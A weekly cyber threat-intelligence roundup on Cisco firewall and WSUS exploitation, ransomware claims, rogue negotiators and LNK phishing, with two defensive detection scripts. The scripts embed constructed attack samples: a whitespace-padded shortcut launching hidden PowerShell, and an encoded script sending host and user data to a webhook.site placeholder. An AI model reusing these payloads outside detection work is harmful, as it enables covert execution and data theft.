Secure: Threat Intelligence Weekly Roundup (November 2-7, 2025)

Covering the latest cyber research and threat developments for the week of November 2-7, 2025.

This week, the cyber landscape saw an alarming mix of speed, sophistication, and insider betrayal. On November 5, Cisco reported a new attack variant against its ASA/FTD firewalls that forces unpatched devices to reload, causing denial of service, while exploitation of the WSUS flaw CVE-2025-59287 continued to spread, with at least 50 organizations compromised since late October. The Department of Justice revealed that ransomware negotiators had been indicted for launching their own attacks alongside the ALPHV/BlackCat gang.

A day later, a wave of ransomware leak-site disclosures hit banking, hospitality, media, and research organizations, and Chinese state-backed actors sustained espionage campaigns against European diplomats. With some intrusions now running from initial access to ransomware in under 24 hours, the week made one thing clear: the detection window is collapsing, and even trusted defenders warrant scrutiny.

Here’s a detailed look at the stories shaping this week in cybersecurity.

Top Attacks and Breaches

Cisco Firewall Zero-Days See New Attack Variant (CVE-2025-20333, CVE-2025-20362)

On November 5, 2025, Cisco became aware of a new attack variant targeting devices running Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software. The attack causes devices that have not been patched for CVE-2025-20333 and CVE-2025-20362 to reload unexpectedly, producing denial-of-service (DoS) conditions; Cisco states that only unpatched devices are affected.

Key Details:

  • Both vulnerabilities were disclosed on September 25, 2025, but had already been exploited as zero-days in intrusions that deployed the RayInitiator bootkit and the LINE VIPER shellcode loader
  • CVE-2025-20333 lets an attacker holding valid VPN credentials execute arbitrary code as root through crafted HTTP requests to the VPN web server; CVE-2025-20362 allows unauthenticated access to restricted URL endpoints. Chained together, they give an unauthenticated attacker root on the firewall
  • Cisco attributes the campaign to UAT4356 (tracked by Microsoft as Storm-1849), the state-sponsored actor behind the 2024 ArcaneDoor intrusions, which researchers have linked to China; exploitation activity has been traced back to May 2025
  • CISA issued Emergency Directive ED 25-03 on September 25, requiring federal agencies to inventory affected devices, collect forensic evidence, hunt for compromise, and patch or disconnect immediately

Immediate Actions:

  • Apply Cisco's fixed software releases immediately; the new variant only affects devices that have not been patched for both CVEs
  • Confirm the running release on every ASA/FTD device (for example with the show version command) against the fixed releases listed in Cisco's advisory, including cold-spare and lab units
  • Monitor for unusual SSL VPN/WebVPN activity: unexpected reloads, crash dumps, or anomalous requests to the VPN web-server endpoints
  • Collect forensic artifacts (core dumps, show tech-support output, logs) from suspect devices before upgrading, since the upgrade wipes volatile evidence

WSUS Zero-Day Exploitation Continues (CVE-2025-59287)

A critical Windows Server Update Services (WSUS) flaw allowing unauthenticated remote code execution with SYSTEM privileges continues to be actively exploited. CISA added it to the Known Exploited Vulnerabilities catalog, mandating prompt patching across federal networks.

Attack Details:

  • Exploitation began on October 24, 2025, one day after Microsoft's out-of-band patch (the original October 14 Patch Tuesday fix was incomplete)
  • At least 50 organizations compromised across universities, technology, manufacturing, and healthcare sectors
  • Attackers run Base64-encoded PowerShell spawned from the WSUS service process (WsusService.exe via cmd.exe) to collect host and domain reconnaissance and post it to webhook[.]site endpoints
  • Sophos confirmed six incidents in customer environments and documented an additional attack chain in which the payload is launched through mmc.exe

Why This Matters: The real danger lies in WSUS's role as the nerve center of enterprise Windows patching. It runs as SYSTEM, every managed endpoint trusts it, and instances are often reachable on TCP 8530/8531 from far more of the network (sometimes the internet) than they need to be. Compromise it, and an attacker can potentially extend their reach across the estate, echoing classic supply-chain abuse like SolarWinds.


November 6 Ransomware Wave Hits Multiple Sectors

On November 6, 2025, several ransomware groups posted new victims to their leak sites on the same day, a cluster of independent extortion claims spanning multiple industries.

Claimed Victims (leak-site postings, Nov 6):

  • LaRosa's Pizza - Medusa ransomware
  • Habib Bank AG - Qilin ransomware
  • McIntosh Labs - SafePay ransomware
  • Nobu Restaurants - Akira ransomware
  • Kiss FM (Spain) - Rhysida ransomware
  • Oxford University Clinical Research Unit - Devman ransomware

Sector Impact: Financial services, hospitality, media, healthcare research, and food service were all hit on the same day. The spread of sectors and the mix of groups point to opportunistic targeting rather than a coordinated campaign; treat leak-site claims as unverified until the victims confirm them.


Everest Ransomware Multi-Target Campaign

The Everest ransomware group claimed responsibility for attacks on AT&T, Dublin Airport, Air Arabia, and Sweden's national power grid operator Svenska kraftnät.

Claimed Victims and Data (per Everest's leak site):

  • AT&T: 576,000 applicant records
  • Dublin Airport: 1.5 million passenger files
  • Air Arabia: 18,000 employee records
  • Svenska kraftnät: 280 GB of internal data from Sweden's power grid operator

Critical Infrastructure Alert: A claim against a national grid operator carries national-security implications well beyond ordinary extortion, and aviation and telecommunications were hit in the same campaign. The volumes above are the group's own claims; treat the scope as unconfirmed until the victims report it.


DOJ Indicts Rogue Ransomware Negotiators

The Department of Justice indicted three people, including two U.S. ransomware negotiators, accused of working with the ALPHV/BlackCat ransomware gang to carry out attacks of their own.

The Accused:

  • Kevin Tyler Martin and another unnamed employee from DigitalMint (ransomware negotiation firm)
  • Ryan Clifford Goldberg, former incident response manager at Sygnia
  • Charged with three counts of computer hacking and extortion related to attempted ransomware attacks against at least five U.S.-based companies

Insider Threat Implications: The three are accused of hacking into companies, stealing sensitive data, and deploying ALPHV/BlackCat ransomware. Sygnia confirmed Goldberg's termination after learning of his alleged involvement; DigitalMint stated Martin was "acting completely outside the scope of his employment."


Chinese APT Group UNC6384 Targets European Diplomatic Entities

The China-affiliated threat actor tracked as UNC6384 targeted European diplomatic entities in Hungary, Belgium, Italy, the Netherlands, and Serbia with EU/NATO-themed spear-phishing that delivers PlugX malware.

Attack Chain:

  • Abuses CVE-2025-9491 (ZDI-CAN-25373), a Windows shortcut (.LNK) UI-misrepresentation flaw exploited in the wild since 2017 and publicly disclosed by Trend Micro's Zero Day Initiative in March 2025
  • Malicious LNK files pad the COMMAND_LINE_ARGUMENTS field with whitespace (spaces, tabs, line feeds) so the Windows Properties dialog shows an empty target line and the real command stays hidden from users and casual triage
  • Malware arsenal includes PlugX, KrustyLoader, SNOWLIGHT, VShell, and GOREVERSE

Note: Microsoft has not patched this vulnerability despite public disclosure in March 2025, so detection must rely on inspecting LNK attachments and on monitoring what the hidden command launches.
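The padding trick above is easy to check for mechanically because the arguments live in a fixed place in the shortcut file. The following is an added example written for this roundup, not code from the page's sources or from any vendor named here: it serializes two minimal .LNK files in memory following the MS-SHLLINK layout (header, then the optional RELATIVE_PATH and COMMAND_LINE_ARGUMENTS strings), parses them back, and flags an argument string that hides a command behind a long run of whitespace. The 64-character cutoff, the sample target path and the lure command line are assumptions chosen for illustration.

```python
"""Added example (not from the roundup or any vendor tooling): build two
minimal Windows shortcut (.lnk) files in memory and flag the
whitespace-padded COMMAND_LINE_ARGUMENTS trick used by CVE-2025-9491 /
ZDI-CAN-25373 lures. Layout follows MS-SHLLINK; the padding threshold and
the sample argument strings are assumptions."""
import struct
from typing import Dict, Optional

HEADER_SIZE = 0x4C
# {00021401-0000-0000-C000-000000000046} in on-disk GUID byte order
LINK_CLSID = bytes.fromhex("0114020000000000C000000000000046")
# LinkFlags bits that decide which optional structures follow the header
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))
# Characters the shortcut Properties dialog renders as blank; the lures pad with these.
PAD_CHARS = " \t\r\n\x0b\x0c"


def _string_data(text: str) -> bytes:
    """StringData item: CountCharacters (uint16) + UTF-16LE chars, no terminator."""
    return struct.pack("<H", len(text)) + text.encode("utf-16-le")


def build_lnk(arguments: str, target: str = r"..\..\Windows\System32\cmd.exe") -> bytes:
    """Minimal shortcut: header, RELATIVE_PATH and COMMAND_LINE_ARGUMENTS only."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LINK_CLSID, flags,
                         0x20,        # FileAttributes: FILE_ATTRIBUTE_ARCHIVE
                         0, 0, 0,     # Creation/Access/Write FILETIME (unset)
                         0, 0,        # FileSize, IconIndex
                         1,           # ShowCommand: SW_SHOWNORMAL
                         0, 0, 0, 0)  # HotKey, Reserved1, Reserved2, Reserved3
    return header + _string_data(target) + _string_data(arguments)


def parse_lnk(blob: bytes) -> Dict[str, Optional[str]]:
    """Skip LinkTargetIDList/LinkInfo if present and pull out the StringData fields."""
    if (len(blob) < HEADER_SIZE or struct.unpack_from("<I", blob)[0] != HEADER_SIZE
            or blob[4:20] != LINK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", blob, 20)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (uint16) + IDList bytes
        pos += 2 + struct.unpack_from("<H", blob, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", blob, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    fields: Dict[str, Optional[str]] = {}
    for flag, name in STRING_FIELDS:             # fixed order per the spec
        if not flags & flag:
            fields[name] = None
            continue
        count = struct.unpack_from("<H", blob, pos)[0]
        pos += 2
        size = count * 2 if unicode else count
        raw = blob[pos:pos + size]
        if len(raw) != size:
            raise ValueError(f"truncated {name}")
        fields[name] = raw.decode("utf-16-le" if unicode else "cp1252")
        pos += size
    return fields


def longest_pad_run(text: str) -> int:
    """Length of the longest consecutive run of padding characters."""
    longest = run = 0
    for ch in text:
        run = run + 1 if ch in PAD_CHARS else 0
        longest = max(longest, run)
    return longest


def scan_lnk(blob: bytes, threshold: int = 64) -> Dict[str, object]:
    """Flag a shortcut whose arguments hide a command behind a long whitespace run.
    64 is an assumed cutoff: legitimate command lines rarely carry that much padding."""
    fields = parse_lnk(blob)
    args = fields["arguments"] or ""
    run = longest_pad_run(args)
    suspicious = run >= threshold
    return {"target": fields["relative_path"], "argument_length": len(args),
            "longest_whitespace_run": run, "suspicious": suspicious,
            "hidden_command": args.strip(PAD_CHARS) if suspicious else None}


# Constructed samples: a normal shortcut and a padded lure in the CVE-2025-9491 style.
BENIGN = build_lnk("/k echo hello")
LURE = build_lnk(" " * 900 + r'/c start "" C:\Users\Public\brief.pdf & '
                 r"powershell -w hidden -File C:\Users\Public\stage.ps1")

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("lure", LURE)):
        print(label, scan_lnk(blob))
```

Run it over quarantined attachments rather than on user workstations; a hit is worth a look even when the hidden command is not obviously hostile, because a long whitespace run in COMMAND_LINE_ARGUMENTS has no legitimate purpose. Real-world samples also carry a LinkTargetIDList and LinkInfo block, which the parser skips by their declared sizes.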


Threat Landscape Analysis

Ransomware attacks rose 28% month-over-month to 421 incidents - the first increase in six months.

Key Metrics:

  • Scattered Spider increased deployment speed by 48%; average attack now completes in 24 hours
  • Europe accounts for 22% of global ransomware victims; 92% of European cases involve both file encryption and data theft
  • 260 initial access brokers advertised access to over 1,400 European organizations

Active Threat Groups:

  • Medusa, Qilin, Akira, Rhysida, SafePay, Devman - All posted victims in the November 6 disclosure wave
  • LockBit 4.0: Re-emerged with updated toolkit, aggressive US private sector campaigns
  • Everest - Critical infrastructure and transportation targeting

AI-Enhanced Threats

AI lowers the skill floor for phishing, deepfakes, and social-engineering campaigns while increasing the scale and believability of threats. As LLMs and generative tools become ubiquitous, adversaries weaponize them just as quickly as defenders deploy them.

Identity Attack Surge: In the first half of 2025 alone, identity-based attacks surged by 32%. More than 97% of identity attacks are password attacks.


Recommendations

Critical Actions (Week of Nov 2-7)

Immediate Patching:

  • Deploy Cisco ASA/FTD patches for CVE-2025-20333 and CVE-2025-20362
  • Apply WSUS patches (CVE-2025-59287) immediately
  • Update Cisco Unified CCX for CVE-2025-20354 (remote code execution) and CVE-2025-20358 (authentication bypass)
  • Address the new CISA KEV entries CVE-2025-11371 (Gladinet CentreStack/Triofox) and CVE-2025-48703 (Control Web Panel)

Threat Hunting:

  • Monitor for cmd.exe or powershell.exe spawned by WsusService.exe, especially with Base64 -EncodedCommand arguments; decode the payload rather than alerting on the flag alone
  • Check for unusual SSL VPN/WebVPN activity and unexplained reloads on Cisco ASA/FTD firewalls
  • Search for EU/NATO-themed phishing emails with LNK attachments
  • Review proxy and DNS logs for connections to webhook[.]site, which has no business purpose on a WSUS server
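The WSUS hunt items above (and the attack chain described under "WSUS Zero-Day Exploitation Continues") boil down to three checks on process-creation telemetry: a shell whose ancestry leads back to the WSUS service, an -EncodedCommand payload, and webhook[.]site inside the decoded script. The following is an added example for this roundup, not code from the page's sources or any vendor: it rebuilds the process tree from pid/ppid links, decodes the UTF-16LE Base64 payload, and returns the reasons each process matched. The record layout and every sample event are constructed for the example (map the fields to Sysmon Event ID 1 or Security 4688 in your SIEM); treating w3wp.exe as a WSUS parent is an assumption, since the WSUS web service also runs under IIS.

```python
"""Added example (not from the roundup or any vendor tooling): hunt
process-creation records for the CVE-2025-59287 post-exploitation pattern
WsusService.exe -> cmd.exe -> powershell.exe -EncodedCommand, and check the
decoded script for webhook.site. All sample events are constructed."""
import base64
import re
from typing import Dict, List, Optional

# WSUS service process; w3wp.exe (the WsusPool IIS worker) is an assumed addition
WSUS_PARENTS = {"wsusservice.exe", "w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# -e, -ec, -enc, -EncodedCommand ... followed by a Base64 token; -ExecutionPolicy does not match
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/]{16,}={0,2})")
EXFIL_MARKERS = ("webhook.site",)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload (Base64 of UTF-16LE), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def ancestors(pid: int, by_pid: Dict[int, dict]) -> List[str]:
    """Walk ppid links and return ancestor image basenames, nearest first."""
    chain: List[str] = []
    seen = set()
    ev = by_pid.get(pid)
    while ev and ev["ppid"] in by_pid and ev["ppid"] not in seen:
        seen.add(ev["ppid"])
        ev = by_pid[ev["ppid"]]
        chain.append(basename(ev["image"]))
    return chain


def hunt(events: List[dict]) -> Dict[int, List[str]]:
    """Return {pid: [reasons]} for every process that matches at least one rule."""
    by_pid = {e["pid"]: e for e in events}
    findings: Dict[int, List[str]] = {}
    for e in events:
        reasons = []
        if basename(e["image"]) in SHELLS and any(a in WSUS_PARENTS for a in ancestors(e["pid"], by_pid)):
            reasons.append("shell_descends_from_wsus")
        decoded = decode_encoded_command(e["cmdline"])
        if decoded is not None:
            reasons.append("encoded_powershell")
            if any(marker in decoded.lower() for marker in EXFIL_MARKERS):
                reasons.append("webhook_site_in_decoded_script")
        if reasons:
            findings[e["pid"]] = reasons
    return findings


def encode_ps(script: str) -> str:
    """Produce -EncodedCommand input the same way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed stage-2 script; the all-zero UUID is a placeholder, not a real collector.
STAGE2 = ("$h = hostname; $u = whoami; Invoke-RestMethod -Method Post "
          "-Uri 'https://webhook.site/00000000-0000-0000-0000-000000000000' -Body \"$h|$u\"")
B64 = encode_ps(STAGE2)
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed process-creation records (pid, ppid, image, cmdline)
    {"pid": 800, "ppid": 4, "image": r"C:\Windows\System32\services.exe", "cmdline": "services.exe"},
    {"pid": 1200, "ppid": 800, "image": r"C:\Program Files\Update Services\Service\WsusService.exe",
     "cmdline": '"C:\\Program Files\\Update Services\\Service\\WsusService.exe"'},
    {"pid": 4312, "ppid": 1200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": f"cmd.exe /c powershell.exe -nop -w hidden -enc {B64}"},
    {"pid": 4320, "ppid": 4312, "image": PS, "cmdline": f"powershell.exe -nop -w hidden -enc {B64}"},
    {"pid": 5100, "ppid": 3001, "image": PS,
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},  # benign admin task
]

if __name__ == "__main__":
    for pid, reasons in hunt(SAMPLE_EVENTS).items():
        print(pid, reasons)
```

The decode step matters: alerting on -EncodedCommand alone drowns in admin noise, while a decoded script that posts hostname and username to a public webhook service from a WSUS server is unambiguous. The ancestry walk also catches the variant chain where the shell is launched one hop further down, as long as the tree still roots in the WSUS service.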

Access Controls:

  • Implement phishing-resistant MFA across remote access
  • Audit privileged access to patch management systems
  • Review vendor access after DigitalMint/Sygnia insider threat case
  • Verify WSUS is segmented from production systems and that TCP 8530/8531 are not reachable from the internet

Strategic Priorities

Defense in Depth:

  • Network segmentation to isolate critical infrastructure (WSUS, firewalls)
  • Air-gapped backups with regular restoration testing
  • EDR with behavioral analytics tuned to catch intrusions that run their full course within 24 hours

Incident Response:

  • Conduct ransomware tabletop exercises focused on 24-hour attack scenarios
  • Review vendor due diligence for negotiation/IR firms
  • Test backup integrity and restoration procedures weekly
  • Establish forensics collection procedures for compromised devices

Protection Coverage

Organizations should verify that the following protections are active:

IPS/IDS Signatures:

  • Cisco ASA/FTD exploitation (CVE-2025-20333, CVE-2025-20362)
  • WSUS Remote Code Execution (CVE-2025-59287)
  • Windows LNK File Exploitation (CVE-2025-9491)
  • PlugX, KrustyLoader, SNOWLIGHT malware C2 traffic

Threat Prevention:

  • Everest, RansomHub, Medusa, Qilin, Akira, Rhysida ransomware indicators
  • ALPHV/BlackCat TTPs
  • UAT4356/Storm-1849 Chinese APT indicators
  • UNC6384 diplomatic targeting IOCs

Email Security:

  • EU/NATO-themed phishing lures
  • Malicious LNK file attachments
  • Base64-encoded payload detection
  • Webhook[.]site domain blocking

Intelligence Summary

The week of November 2-7, 2025 demonstrated continued sophistication in both nation-state and cybercriminal operations. The November 5 discovery of a new Cisco firewall attack variant, combined with ongoing WSUS exploitation affecting at least 50 organizations, and a November 6 wave of ransomware disclosures indicate attackers are moving faster and exploiting vulnerabilities more efficiently than ever.

Most Concerning Development: The DOJ indictment of ransomware negotiators who allegedly worked with ALPHV/BlackCat to conduct their own attacks represents an insider threat vector that directly challenges trust in third-party incident response relationships.

Critical Takeaway: With groups like Scattered Spider now moving from initial access to full compromise in about 24 hours, detection and response velocity is the critical differentiator between containment and catastrophic breach.


Stay vigilant. Patch aggressively. Test your defenses. Or let digital teammates help you do it best.